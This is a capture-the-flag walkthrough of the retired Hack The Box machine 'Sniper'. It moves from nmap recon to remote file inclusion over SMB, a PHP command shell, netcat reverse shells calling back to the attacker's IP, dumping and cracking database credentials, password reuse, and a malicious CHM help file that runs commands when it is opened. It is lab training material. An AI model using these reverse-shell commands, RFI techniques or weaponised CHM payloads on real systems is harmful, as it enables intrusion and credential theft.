Hackthebox.eu - Retired - Sniper
Recon
As always I start with a simple UP/Down scan on all TCP ports to see what is open
# nmap -T4 -p- -oX ./nmapb.xml sniper.htb
Then Convert it to HTML to make it pretty
xsltproc ./nmapb.xml -o nmapb.html
Then rescan the open ports with -A to finger OS/Services
nmap -T4 -A -p80,135,139,445,49667 sniper.htb -oX ./nmapf.xml
Then convert that to HTML too
xsltproc ./nmapf.xml -o ./nmapf.html
Looks like we have a windows box with IIS on port 80 RPC and smb
Let's see what we get when browsing the IIS
Blog from home page
And this login for "Client Portal"
Tried enrolling a new user with the name admin for possible account enumeration….
Nope, it just let me create it now problem
No anonymous access on smb
No access on RPC either
Exploit
Alight so I've poked around.
I think this might be susceptible to RFI
I found on this on the blog post page
<li><a href="/blog?lang=blog-en.php">English</a></li>
Looks like we can use "?Lang" to call other sites.
I started up a new tool I found about today called updog which is like simpleHTTPServer
# updog -d /root/Desktop/HTB/Sniper/ -p 80
And just tried to call my HTML output of nmap
So I don't see it calling out to my webserver to get the html file
I found this blog that says we might use smb to get around any filter that might be in place that was making a call via HTTP
http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
So I started up an SmbServer
python /opt/impacket-master/examples/smbserver.py SHARE /root/Desktop/HTB/Sniper/ -smb2support
I added this from the blog to my /etc/samba/smbd.conf
[ica]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
And changed my browser to point to
I get this error message, but I do see
An SMB connection from sniper.htb to my smbserver
I fought with this for a while but the SMB connection using impacket's smbserver.py kept closing and the PHP files weren't loading. So I followed what in the blog to use the samba server in kali. I also moved over the newest kali OS at this point too.
I eventually got the PHP in the blog to open and let me poke around a bit
I found this interesting file under the /user folder
Db.php
Looks like a user/pass
So username: dbuser
Password: 36mEAhz/B8xQ~2VM
Dbname: sniper
Playing around trying to get a better shell
I did get a POC for a pingback
My PHP code
<?php shell_exec('ping 10.10.14.48');?>
Saved as rs.php
Does indeed get pingback from the server
This gets ping back with either exec() or shell_exec()
I found a much better php shell
I stuck this in my /var/www/html/pub share
So much cleaner and the cmd actually works
So we have a user named chris
So we have no write access to the box at all, nowhere to store our powershell scripts or netcat to get a reverse shell
How ever we do still have our smb share
I moved nc.exe to my smb share and then on the PHP shell
Net use X: \\10.10.14.48\ica
We can see it mapped the drive as X
Now we should be able to use netcat to get our reverse shell
Make sure we are listening on our Kali box
Then on the PHP Shell
X:\nc.exe 10.10.14.48 443 -e C:\Windows\System32\cmd.exe
And
We gotsta shell!!!!!!
Now let's try and get some info out of the DB we saw earlier.
For some reason I couldn't get any response on from just the cmd
So I loaded it up in powershell
Used this string to connect
./mysql.exe --user=dbuser --password=36mEAhz/B8xQ~2VM sniper
Since we saw the table was called users earlier I just did
Select * From users;
We know from the login.php
Login.php the password is md5
id username email password trn_date
1 superuser admin@sniper.co 6e573c8b25e9168e0c61895d821a3d57 2019-04-11 22:45:36
Popped that into a online hash decrypter
So user superuser
Password $uperpassw0rd
I tried getting some escalation with this account but couldn't' get anything..
But what about the dbuser password? 36mEAhz/B8xQ~2VM
I wonder if maybe that might be the password for the chris account.
I tired to connect to the SMB share on sniper using chris and that password
Yup password reuse FTW!!!
This took me forever to find the commands and get the syntax right for this next part
Basically we are going to use powershell to save the credentials and then call a new netcat connection to our attacking box
powershell
$username = 'sniper\chris'
$password = '36mEAhz/B8xQ~2VM'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
Invoke-Command -Credential $credential -Computer localhost -ScriptBlock {\\10.10.14.48\ica\nc.exe 10.10.14.48 55555 -e C:\windows\system32\cmd.exe}
Connected!
Let's get that user hash
type user.txt
21f************************************
Looking around I found a directory under C:\ named Docs
It contains a TXT and a nice note from the CEO
I also found an instructions.chm under the downloads folder.
What is a CHM file you ask?
Basically a help file that is really just so HTML pages
Cool how do you read a CHM file from command line?
You can use hh.exe which is included with windows…. How nice of them
Here is the output of the decompressed file
>hh.exe -decompile output instructions.chm
C:\temp\output>type a.html
type a.html
<html>
<body>
<h1>Sniper Android App Documentation</h1>
<h2>Table of Contents</h2>
<p>Pff... This dumb CEO always makes me do all the shitty work. SMH!</p>
<p>I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.</p>
</body>
</html>
But what might be more interesting than that is that you can open web pages with hh.exe also, since it is essentially just reading HTML files….
And you might be able to use HH.exe to bypass AV if they don't scan what it opens...
I wanted to get the instructions.chm to my samba share so I had to make some changes to the config file and restart the service
I added
[ica]
path = /var/www/html/pub
public = yes
browseable = yes
create mask = 0777
read only = no
directory mode = 0777
force user = root
Then restarted the service
Service smbd restart
Now I can copy this file to my samba share
I went ahead and gabbed the txt file from the other directory too
I found this blog to get this next part going
I modified it at first just to ping back to my kali box
I inserted this to the HTML of a decompiled chm file I had on my windows box( It was nvidia CHM). Then saved the file as ping.htm
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
Created a project.hpp
WIth this inside
[OPTIONS]
[FILES]
C:\Users\*********\Desktop\chm\ping.htm
Compiled it using
C:\Users\*********\Desktop\chm\output>"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp
Copied it over to my kali box
Then I copied it into the directory the boss told me to put the documentation in.
C:\docs
And I got a ping back, which I assume happens when the boss opened the chm file to look at my documentation :)
Now we just need to get it to execute something so we can get a shell as our boss once he opens the documentation.
I spent a lot of time here trying to get this shell back, but it seems like even though it executes the chm file as the boss, there isn't actually a session for me to grab hold of here…
So what about just writing the file out to a place we can read.
I put this line in my HTML file
<PARAM name="Item1" value=',cmd.exe, /c type C:\Users\administrator\Desktop\root.txt > C:\temp\root.txt'>
Recompiled my CHM
Renamed it to Project-type.chm
Moved it to my SMB
Copied it to C:\docs
After a minute my chm disappeared as is the usual for chm files in the C:\docs directory. Which emulates the box reading the documentation and moving it to another location.
Then in the C:\temp folder we created we see our root.txt
Now we can read it !!!!!
I know that technically we could use this to completely take over the box, but it just feels cheap writing out the root.txt to a location we can read.
Comments
Post a Comment